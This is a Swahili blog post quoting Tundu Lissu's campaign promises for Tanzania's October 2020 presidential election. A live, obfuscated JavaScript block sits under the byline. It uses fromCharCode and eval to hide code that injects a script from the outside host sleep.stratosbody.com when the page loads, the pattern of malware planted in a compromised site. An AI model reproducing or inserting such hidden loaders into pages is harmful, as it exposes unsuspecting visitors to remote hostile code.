Recent Comments

BAADHI YA MANENO ALIYOZUNGUMZA TUNDU LISSU MTIA NIA WA KITI CHA URAIS KUPITIA CHADEMA UCHAGUZI MKUU WA OKTOBA 2020

By ObyMack David Jun 8, 2020
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

“Endapo nitachaguliwa kuwa Rais wa Tanzania, katika Uchaguzi Mkuu ujao, nitafutilia mbali Sheria zote za kikandamizaji ambazo zinaumiza wananchi na wakosoaji wa serikali inayokuwa madarakani,”
:
”Nikipata dhamana ya kuwa Rais wa Jamhuri ya Muungano wa Tanzania, nitaongeza uhuru wa wananchi kufanya kazi zao bila kubugudhiwa,”
:
”Nafahamu ubora wa Watanzania haswa kwenye ubunifu hivyo nikiwa Rais nitaweka mfumo rahisi kwa wananchi kunufaika na kazi zao tofauti na sasa ambapo wengi hawawezi kuonesha uwezo wao kutokana na kujaa hofu,”
:
“Nikiwa Rais Serikali yangu itafuata kanuni sheria pamoja na mikataba ya kimataifa ambayo tumekubaliana kuifuata,”
:
“Uamuzi wa Spika Ndugai wa kunifutia Ubunge haujaniondolea sifa za kugombea nafasi yoyote katika nchi tangu naomba wananchi wenzangu mniunge mkono katika safari yangu,”
:
“Mimi nina sifa zote za kuwania nafasi yoyote katika nchi hii na wala sijapoteza sifa hizo kutokana na Spika Job Ndugai kunifutia ubunge. Sijawahi kutuhumiwa wala kuthibitika kuwa na makosa mbele ya Sekretarieti ya Maadili ya Viongozi wa Umma,”
:
“Kuna haja ya kuwa na maridhiano ya kitaifa, hatutukuwa na visasi tukishika madaraka kwani visasi ni upango kwa walio dhaifu, lakini si ngao kwa walio majasiri”
:
”Katika uongozi wangu, nitaondoa vikwanzo vyote vinavyokandamiza vyama vya siasa na nitalinda mfumo wa vyama vingi, badala ya kukandamiza vyama vinavyopingana na serikali iliyopo madarakani,”
:
”Endapo nitakuwa Rais nitakuwa mfariji mkubwa wa wananchi wakati wa majanga makubwa na sitakimbilia kijijini kwetu, sitawabeza wala kuwakwaza wananchi kwa yale yaliyowafika bali nitalia nao na kuwa msaada kwao”
:
”Endapo nitachaguliwa, nitarudisha mamlaka ya Bunge kama zamani, nitaondoa vifungo na mateka yaliyowekwa kwenye mahakama zetu na nitaheshimu uhuru wa Mahakama katika wajibu wao wa kutenda haki,”
:
”Nimezunguka karibu Dunia nzima kasoro bara la Australia ndilo sijafika, hivyo nina uzoefu wa kutosha na mahusiano mazuri na nchi tofauti tofauti, endapo nitachaguliwa nitahakikisha natumia vizuri mahusiano hayo kwa manufaa ya Taifa,”